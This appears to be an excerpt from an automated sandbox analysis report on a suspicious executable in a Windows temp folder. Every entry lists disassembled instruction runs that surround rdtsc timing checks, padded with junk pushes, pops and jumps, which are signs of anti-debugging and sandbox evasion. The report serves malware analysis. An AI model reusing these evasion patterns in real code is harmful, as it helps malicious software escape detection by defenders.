Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 737F87 second address: 737F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 737F8D second address: 737FAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D1080A4Bh 0x00000009 popad 0x0000000a jmp 00007F69D1080A4Fh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 73867C second address: 738682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 738682 second address: 738686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 738686 second address: 73868A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 737A3E second address: 737A51 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F69D1080A4Ch 0x00000008 jc 00007F69D1080A46h 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 740DFF second address: 740E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 740E03 second address: 740E46 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F69D1080A62h 0x0000000c jmp 00007F69D1080A53h 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 740E46 second address: 740E51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 740E51 second address: 740E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F69D1080A51h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 740E6D second address: 740E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F69D121AB26h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 740FF2 second address: 741000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jp 00007F69D1080A46h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 74EC41 second address: 74EC4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F69D121AB26h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 74EC4B second address: 74EC4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 74EC4F second address: 74EC5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F69D121AB26h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 74EC5F second address: 74EC6E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnc 00007F69D1080A46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 74EC6E second address: 74EC74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 75402C second address: 754032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 754032 second address: 754038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 754038 second address: 754040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 754040 second address: 75405A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D121AB31h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 75405A second address: 754064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F69D1080A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 753C4A second address: 753C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 je 00007F69D121AB26h 0x0000000e jmp 00007F69D121AB31h 0x00000013 popad 0x00000014 pushad 0x00000015 push esi 0x00000016 pop esi 0x00000017 jmp 00007F69D121AB31h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 75BA36 second address: 75BA7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A52h 0x00000007 jmp 00007F69D1080A55h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F69D1080A57h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 75BA7C second address: 75BA8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F69D121AB2Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 761E61 second address: 761E80 instructions: 0x00000000 rdtsc 0x00000002 js 00007F69D1080A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F69D1080A55h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 761E80 second address: 761EB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB38h 0x00000007 jo 00007F69D121AB3Ah 0x0000000d jmp 00007F69D121AB2Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 761CA3 second address: 761CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 ja 00007F69D1080A46h 0x0000000b pushad 0x0000000c popad 0x0000000d jns 00007F69D1080A46h 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 pushad 0x00000017 push esi 0x00000018 pop esi 0x00000019 jnc 00007F69D1080A46h 0x0000001f jmp 00007F69D1080A4Ch 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 761CD5 second address: 761CD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 764332 second address: 76437F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F69D1080A4Ah 0x00000008 jne 00007F69D1080A46h 0x0000000e jbe 00007F69D1080A46h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 jns 00007F69D1080A5Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F69D1080A4Ch 0x00000025 jp 00007F69D1080A46h 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 76437F second address: 7643A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F69D121AB26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F69D121AB38h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 76B3F4 second address: 76B409 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F69D1080A4Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 76B409 second address: 76B429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F69D121AB38h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 76B429 second address: 76B42F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 76B820 second address: 76B852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F69D121AB2Fh 0x0000000f jmp 00007F69D121AB39h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 76B9A9 second address: 76B9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 76B9AE second address: 76B9C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F69D121AB2Ch 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 76B9C0 second address: 76B9DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Bh 0x00000007 jno 00007F69D1080A46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 77278E second address: 772796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 772796 second address: 77279C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 77279C second address: 7727A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 78BE51 second address: 78BE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 78BCA9 second address: 78BCB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 78BCB0 second address: 78BCD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D1080A52h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 78BCD1 second address: 78BCD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 78BCD5 second address: 78BCD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 78BCD9 second address: 78BCE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 78F78C second address: 78F79E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F69D1080A4Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 78F8EA second address: 78F902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F69D121AB2Bh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7A8834 second address: 7A8840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F69D1080A46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7A8840 second address: 7A885E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F69D121AB39h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7A885E second address: 7A8863 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7A77C8 second address: 7A77CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7A7EAF second address: 7A7EB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7A9ED9 second address: 7A9EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7A9EDD second address: 7A9EE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7A9EE1 second address: 7A9EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F69D121AB2Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7ACAA0 second address: 7ACAC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ecx 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F69D1080A55h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7ACD65 second address: 7ACD69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7ACD69 second address: 7ACD74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F69D1080A46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7ACD74 second address: 7ACDC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jnl 00007F69D121AB2Ah 0x00000010 push dword ptr [ebp+122D2D1Ah] 0x00000016 pushad 0x00000017 jmp 00007F69D121AB32h 0x0000001c mov ebx, dword ptr [ebp+122D3719h] 0x00000022 popad 0x00000023 mov dx, 8D6Bh 0x00000027 call 00007F69D121AB29h 0x0000002c ja 00007F69D121AB30h 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7ACDC0 second address: 7ACDD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F69D1080A4Ch 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7ACDD4 second address: 7ACE04 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F69D121AB3Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007F69D121AB2Ch 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7ACE04 second address: 7ACE18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D1080A50h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7ACE18 second address: 7ACE3E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F69D121AB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F69D121AB36h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7ACE3E second address: 7ACE45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7ACE45 second address: 7ACE56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7ACE56 second address: 7ACE5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7ACE5C second address: 7ACE72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F69D121AB31h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7AE499 second address: 7AE49E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 7B036E second address: 7B0396 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F69D121AB26h 0x00000009 jne 00007F69D121AB26h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jne 00007F69D121AB26h 0x0000001e jno 00007F69D121AB26h 0x00000024 popad 0x00000025 push ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B70032 second address: 4B70038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B70038 second address: 4B7003C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B7003C second address: 4B700B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d call 00007F69D1080A4Fh 0x00000012 pushfd 0x00000013 jmp 00007F69D1080A58h 0x00000018 add cx, B948h 0x0000001d jmp 00007F69D1080A4Bh 0x00000022 popfd 0x00000023 pop eax 0x00000024 jmp 00007F69D1080A59h 0x00000029 popad 0x0000002a xchg eax, ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F69D1080A4Dh 0x00000032 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B700B3 second address: 4B7010B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F69D121AB2Eh 0x00000010 pop ebp 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007F69D121AB38h 0x0000001a jmp 00007F69D121AB35h 0x0000001f popfd 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B50DD3 second address: 4B50DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B50DD7 second address: 4B50DF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B50DF2 second address: 4B50DF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B50DF8 second address: 4B50DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B50DFC second address: 4B50E17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop eax 0x00000011 movsx ebx, cx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B50E17 second address: 4B50E66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cx, BD39h 0x00000011 pushfd 0x00000012 jmp 00007F69D121AB36h 0x00000017 sbb eax, 79782F48h 0x0000001d jmp 00007F69D121AB2Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B50E66 second address: 4B50E93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F69D1080A4Dh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B50E93 second address: 4B50EFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F69D121AB37h 0x00000009 and ax, EF9Eh 0x0000000e jmp 00007F69D121AB39h 0x00000013 popfd 0x00000014 jmp 00007F69D121AB30h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ebp, esp 0x0000001e jmp 00007F69D121AB30h 0x00000023 pop ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 movsx edx, ax 0x0000002a push eax 0x0000002b pop edx 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B50EFC second address: 4B50F02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
